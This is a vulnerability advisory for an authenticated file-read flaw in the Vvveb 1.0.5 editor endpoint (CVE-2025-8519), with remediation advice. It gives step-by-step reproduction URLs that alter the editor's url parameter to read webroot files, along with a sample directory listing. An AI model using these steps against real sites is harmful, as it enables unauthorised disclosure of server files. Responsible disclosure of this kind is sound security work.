DELTA OBSCURA

We are the team behind Mission Cyber Sentinel, a mission dedicated to securing 446,000 digital assets globally.

GitHub

Vvveb - v1.0.5 - Internal File Read

By 0xhamy 03:24 AM - September 29th 2025
Type software
Product Environment web
Product Name Vvveb
Product Vendor Vvveb
Product Version 1.0.5
Product Link https://github.com/givanz/Vvveb
Vulnerability Name Internal File Read
Severity Medium
CVSS String CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS Score 4.3
CVE ID CVE-2025-8519
Vendor Acknowledgement Yes
Affected digital Assets 268
Affected Users 26800
Date of Reporting Jan 03, 2025
PoC Exploit -
Credit 0xhamy

Description

The editor endpoint /vadmin123/index.php?module=editor/editor&url=/&template=index.html exposes a file-read vector that allows an authenticated user with Edit website privileges to read legacy Vvveb files from the webroot. In this test the issue was limited to non-sensitive legacy files (e.g., LICENSE, README.md, package.json, static error pages), so the current severity is Low. However, the vulnerability reveals server file paths and can expose configuration or other information if sensitive files exist under the accessible directory.

Reproduce

Preconditions: an account with access to the site’s Edit website / editor functionality.

  1. Log in as an editor (or any role with “Edit website” permissions).
  2. Open the editor URL:
  http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=/&template=index.html
  1. Modify the url parameter to point at a filename (or path) under the legacy Vvveb directory. Example:
  http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=index.html
  1. The modified request allows browsing/reading files from:
  /var/www/html/public/admin/default

Example files found during testing:

/var/www/html/public/admin/default # ls -la

total 448
drwx-wx-wx   22 www-data www-data      4096 Jan  3 14:56 .
drwx-wx-wx    3 www-data www-data      4096 Jan  3 14:57 ..
-rwx-wx-wx    1 www-data www-data     10173 Jan  3 14:56 LICENSE
-rwx-wx-wx    1 www-data www-data      5378 Jan  3 14:56 README.md
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 admin
drwx-wx-wx    3 www-data www-data      4096 Jan  3 14:56 content
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 css
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 editor
drwx-wx-wx    4 www-data www-data      4096 Jan  3 14:56 email
-rwx-wx-wx    1 www-data www-data     73835 Jan  3 14:56 error403.html
-rwx-wx-wx    1 www-data www-data     73408 Jan  3 14:56 error404.html
-rwx-wx-wx    1 www-data www-data     74142 Jan  3 14:56 error500.html
-rwx-wx-wx    1 www-data www-data      3150 Jan  3 14:56 favicon.ico
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 field
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 fields
  1. Confirm file read by requesting a specific file directly via the url parameter, e.g.:
  http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=package.json

or:

  http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=tools/systeminfo.html
  1. Observation: the server returns the contents of the requested file. In this assessment only non-sensitive legacy files were exposed; you were not able to read sensitive system files in this test.

Recommendation

  • Restrict file access by design: Validate and canonicalize the url parameter server-side. Only allow reading files from a controlled content store (e.g., database or a specific whitelist of templates), never arbitrary filesystem paths.
  • Input validation / path normalization: Reject or sanitize path traversal and relative path components (.., ./) and ensure the resolved path is contained within an allowed base directory. Prefer mapping logical template names to fixed file locations rather than accepting arbitrary filenames.
  • Least privilege for editor functionality: Ensure editor roles cannot access underlying filesystem artifacts. Limit the set of users who can view or edit raw template files.
  • Deny direct access to legacy directories: Move legacy/unused Vvveb assets out of the webroot or restrict access via server configuration (deny from all) so they cannot be served even when referenced.
  • Use explicit whitelists: Implement a whitelist of allowed template names/URLs; any request that does not match a known template should be rejected with a generic error.
  • Logging & monitoring: Log attempts to access unexpected files and alert on read attempts to configuration files or other sensitive locations.
  • Periodic cleanup: Remove or archive outdated/unused code and asset directories (like old Vvveb files) from production systems to reduce attack surface.
  • Pen-test / code review: Add unit/integration tests for the editor endpoint to assert that only permitted files are returned and perform a focused review of file-serving logic.

Applying these mitigations will prevent arbitrary file-read via the editor url parameter and reduce the chance of exposing sensitive configuration or internal files.